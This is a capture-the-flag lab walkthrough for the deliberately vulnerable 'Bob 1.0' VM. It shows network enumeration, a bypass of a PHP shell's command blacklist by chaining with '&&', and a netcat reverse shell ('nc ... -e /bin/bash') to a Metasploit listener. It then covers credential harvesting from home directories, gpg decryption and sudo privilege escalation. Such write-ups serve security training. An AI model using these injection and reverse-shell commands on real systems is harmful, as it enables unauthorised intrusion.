Lab - CTF - Bob 1.0.

1 Walkthrough

Overview

This Capture the Flag exercise is rated Beginner/Intermediate. In the scenario, the Milburg
Highschool Server was compromised, causing the school's Window server to be replaced with
a Linux server. Your job is to find as many attack vectors as you can and access the flag
located at the root of the new Linux server.

Remember your hacking methodology and to enumerate everything!

Hardware and Software Requirements

 One virtual install of Kali Linux, updated

 One virtual install of the Bob OVA file available for download here

Administration

For this CTF, I created a desktop directory called, bob. I’ll be doing all my work inside of this
directory.

Enumeration

The first thing we need to do is find the target. For this, we can use netdiscover.

netdiscover -r 192.168.0.0/24

1
© 2018 syberoffense.com All Rights Reserved
I identify my target as 192.168.0.27. We can now run a Nmap scan of the target.

nmap -O -A -sT -sV -p- -T5 192.168.0.27 -vvv

NMap found two services, HTTP and SSH and some interesting files.

Searchsploit comes up negative.

We run dirb and nikto to see if anything pops up. Both provide the same results.

dirb http://192.168.0.27

2
© 2018 syberoffense.com All Rights Reserved
nikto -h 192.168.0.27

3
© 2018 syberoffense.com All Rights Reserved
HTTP is the low hanging fruit and possible our best source for a target vector. As with all web
servers, the robots.txt is always a source of interest. These are web pages not being cataloged
by search engines.

We have two HTML files, lat_memo.html and passwords.html

192.168.0.27/lat_memo.html

http://192.168.0.27/passwords.html

4
© 2018 syberoffense.com All Rights Reserved
The next page is the dev_shell.php page. This is going to be our attack vector. Enumerate the
page and check out the source code.

5
© 2018 syberoffense.com All Rights Reserved
There is a blacklist, commands like ls, pwd, cat, nc are being blocked. Nothing we can't work
around. We can replace ls with find, echo, dir, and cat. There are different ways to
execute commands other than using a semicolon.

The double ampersand (&&) or a pipe ( | ) or double pipe ( || ) can be used to execute
commands. For instance, we can use the echo command with && to execute the id
command.

echo && id

We see that the shell is using the www-data account to run.

We need to establish a reverse shell which can be done a few different ways, but simple is
always better. We can use the Metasploit framework and the exploit multi/handler
to as a listener for out reverse shell using Netcat.

6
© 2018 syberoffense.com All Rights Reserved
use exploit/multi/handler

Set the payload as linux/x86/shell/reverse_tcp

set payload linux/x86/shell/reverse_tcp

Set the payload options. The LHOST will use the IP address of our Kali machine.

show options

I type in the run command, and I have the listener up and running.

At the targets PHP shell, I type:

echo && nc 192.168.0.30 4444 -e /bin/bash

7
© 2018 syberoffense.com All Rights Reserved
Back at the Metasploit terminal, I now have a basic shell.

Next, we use our tried and true Python code to give us an interactive shell.

python -c 'import pty; pty.spawn("/bin/bash")'

Let’s enumerate what we have so far by listing the contents of the shell.

8
© 2018 syberoffense.com All Rights Reserved
Let’s cat out the.hint file.

Been there, done that.

We know that Bob is the admin for the school, so we should see if we can find his profile. I
get back to root and change location over to the home directory. I list the contents and
permissions of the home directory and find the following directories.

9
© 2018 syberoffense.com All Rights Reserved
I change location over bob and list the contents.

I use the head command to see the contents.

We have discovered the credentials for two of the four individuals found on the system.

10
© 2018 syberoffense.com All Rights Reserved
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

Bob has a documents folder, and inside we find a login.txt.gpg

The secret directory is of interest, so I change location over to it and list its contents.

We find another directory named, Keep_Out. We change location and list the contents.

We find another directory entitled Not_Porn. I change directory and list the contents.

11
© 2018 syberoffense.com All Rights Reserved
We have another directory named No_Lookie_in_Here. I change directory and list the
contents.

Here we find a script name notes.sh. I cat out the contents.

We’ll come back this.

Let’s examine elliot’s home directory.

(snipped…)
12
© 2018 syberoffense.com All Rights Reserved
 We examine the adminisdumb.txt file.

More password information. We now have the following sets of credentials:

elliot:theadminisdumb
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

Seb has nothing to offer so we can return our attention the notes.sh file.
13
© 2018 syberoffense.com All Rights Reserved
The first letter of each line spells out the word HARPOCRATES. Harpocrates was the Greek
god of silence, secrets, and confidentiality.

We next need to decrypt the login.txt.gpg discovered earlier in bob’s document

directory. We change location back to bob’s documents and run the following command:

gpg –passphrase HARPOCRATES -d login.txt.gpg

We have the admin’s credentials, so we can logon as bob using SSH.

14
© 2018 syberoffense.com All Rights Reserved
I check to see what sudo permissions bob has.

We can now login as root using sudo su. Change location to the root directory.

15
© 2018 syberoffense.com All Rights Reserved
List the contents, find the flag.txt file and view the contents.

End of the lab!

Summary

A lot of good stuff going on with this one. The PHP Dev page was locked down with a
blacklist of commands not allowed but we saw how to get around that roadblock. We also
learned how to create still another reverse shell and elevate it to a more interactive shell using
Metasploit.

16
© 2018 syberoffense.com All Rights Reserved
 17
© 2018 syberoffense.com All Rights Reserved